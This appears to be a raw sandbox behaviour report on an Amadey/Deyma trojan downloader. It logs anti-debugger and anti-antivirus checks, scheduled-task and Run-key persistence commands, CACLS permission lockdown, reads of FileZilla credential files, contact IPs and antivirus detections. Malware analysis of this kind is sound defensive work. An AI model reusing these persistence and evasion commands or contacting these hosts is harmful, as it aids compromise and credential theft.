key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
host 62.182.156.152
host 95.143.190.57
host 77.91.68.63
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description oneetx.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
description YoutubeAdvert.exe tried to sleep 5456575 seconds, actually delayed analysis time by 5456575 seconds
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\64.dll reg_value rundll32 C:\Users\test22\AppData\Local\Temp\1000006061\64.dll, rundll
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\YoutubeAdvert.exe reg_value C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\9b11736588" /P "test22:N"&&CACLS "..\9b11736588" /P "test22:R" /E&&Exit
cmdline CACLS "..\9b11736588" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\9b11736588" /P "test22:N"&&CACLS "..\9b11736588" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "..\9b11736588" /P "test22:N"
Time & API Arguments Status Return Repeated

__anomaly__

tid: 2804
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
3221225507 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 67 f5 ff ff c3 e9 5e 6b 00 00 92 c6 12 cb
exception.symbol: youtubeadvert+0x519ecb
exception.instruction: in eax, dx
exception.module: YoutubeAdvert.exe
exception.exception_code: 0xc0000096
exception.offset: 5349067
exception.address: 0x919ecb
registers.esp: 1638268
registers.edi: 7915946
registers.eax: 1447909480
registers.ebp: 6307840
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 13
registers.ecx: 10
1 0 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Deyma.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.67464031
CAT-QuickHeal Trojandownloader.Deyma
ALYac Trojan.GenericKD.67464031
Malwarebytes Trojan.Downloader
VIPRE Trojan.GenericKD.67464031
Sangfor Downloader.Win32.Deyma.V7qe
K7AntiVirus Trojan ( 0059d2b31 )
Alibaba TrojanDownloader:Win32/Deyma.b3ead6ae
K7GW Trojan ( 0059d2b31 )
CrowdStrike win/malicious_confidence_100% (W)
Cyren W32/ABRisk.NLTL-0247
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/GenCBL.DHF
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky Trojan-Downloader.Win32.Deyma.dkl
BitDefender Trojan.GenericKD.67464031
ViRobot Trojan.Win.Z.Agent.3891384
Avast Win32:BotX-gen [Trj]
Emsisoft Trojan.GenericKD.67464031 (B)
DrWeb Trojan.Siggen20.56222
TrendMicro Trojan.Win32.AMADEY.YXDFKZ
McAfee-GW-Edition Artemis!Trojan
Trapmine malicious.high.ml.score
FireEye Generic.mg.325cedfb3e4d23dd
Sophos Mal/Generic-S
GData Trojan.GenericKD.67464031
Webroot W32.Trojan.Gen
Antiy-AVL Trojan/Win32.GenCBL
Gridinsoft Ransom.Win32.Sabsik.cl
Arcabit Trojan.Generic.D4056B5F
Microsoft Trojan:Win32/Casdet!rfn
Google Detected
AhnLab-V3 Trojan/Win.AntiAnalysis.C5386312
McAfee Artemis!325CEDFB3E4D
MAX malware (ai score=87)
Cylance unsafe
Panda Trj/Chgt.AD
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXDFKZ
Rising Downloader.Amadey!8.125AC (TFE:5:65oQciLZtWJ)
Fortinet W32/GenCBL.DHF!tr
BitDefenderTheta Gen:NN.ZexaF.36250.Tpvaa0U6R8cO
AVG Win32:BotX-gen [Trj]
DeepInstinct MALICIOUS